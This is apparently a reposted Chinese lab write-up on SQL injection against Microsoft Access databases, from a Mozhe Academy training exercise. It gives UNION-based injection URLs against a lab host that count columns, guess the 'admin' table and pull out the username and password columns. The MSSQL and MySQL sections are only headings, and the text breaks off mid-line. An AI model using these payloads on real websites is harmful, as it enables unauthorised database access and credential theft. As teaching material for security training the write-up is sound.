赞
踩
access数据库: access 表名 列名 数据 mysql、mssql等数据库: 数据库名 表名 列名 数据 --->比正常其它数据库少一级,其数据库保存在网站原码下面。 --->后缀格式为mdb、asp、asa,可以通过一些暴库手段、目录猜解等直接下载数据库。 --->另一个网站的数据库假如也是access,则其数据库也保存在它自己网站原码的目录下, 和上一个网站没有任何关系,将不存在跨库注入。 --->access没有文件读写。 --->access三大攻击手法 1.access注入攻击片段-联合查询法 2.access注入攻击片段-逐字猜解法 3.工具类的使用注入(推荐) --->access注入攻击方式 主要有:union注入、http header注入、偏移注入等
本实例来自墨者学院
第一步:判断字段数
- 219.153.49.228:49079/new_list.asp?id=1%20order%20by%204
- 返回页面正常
- 219.153.49.228:49079/new_list.asp?id=1%20order%20by%205
- 返回页面不正常
-
- ------>列数(字段数)为:4
第二步:猜解表名
因为access数据库不包含数据库名,所以直接从表名开始查询。
因为access数据我库不像Mysql数据库中存在系统数据库“information_schema”,所以在注入过程中需要我们进行暴力猜解。
- 向网站末尾添加猜测的表名
- 如果数据库中存在此表,网页就会返回数字
- 如果数据库中不存在此表,网页就会返回错误
- 219.153.49.228:49079/new_listasp?id=1%20union%20select%201,2,3,4%20from%20admin
- 页面返回数字,存在表名admin
- 219.153.49.228:49079/new_listasp?id=1%20union%20select%201,2,3,4%20from%20dsadasdasd
- 页面返回错误,不存在表名dsadasdasd
第三步:猜解列名
猜解完表明后用同样的方法猜解列名
- 向网站内添加猜测的列名
- 如果数据库中存在此列,网页就会返回相应数据
- 如果数据库中不存在此列,网页就会返回错误
- 219.153.49.228:49079/new_list.asp?id=1%20union%20select%201,username,passwd,4%20from%20admin
-
- 经过不断猜解,最终正确列名为username和passwd,成功查询出了数据。
第四步:密码解密
第五步:登录后台获取KEY
第六步:提交KEY
详细内容可参考“MSSQL注入”
Sql Sever注入
本实例来自墨者学院
判断数据库类型
判断数据库版本
使用工具
Mysql注入
------>注意与Mysql进行对比。
判断数据库版本
本实例来自墨者学院
数据库识别
- ┌──(root声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/370747推荐阅读
相关标签
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。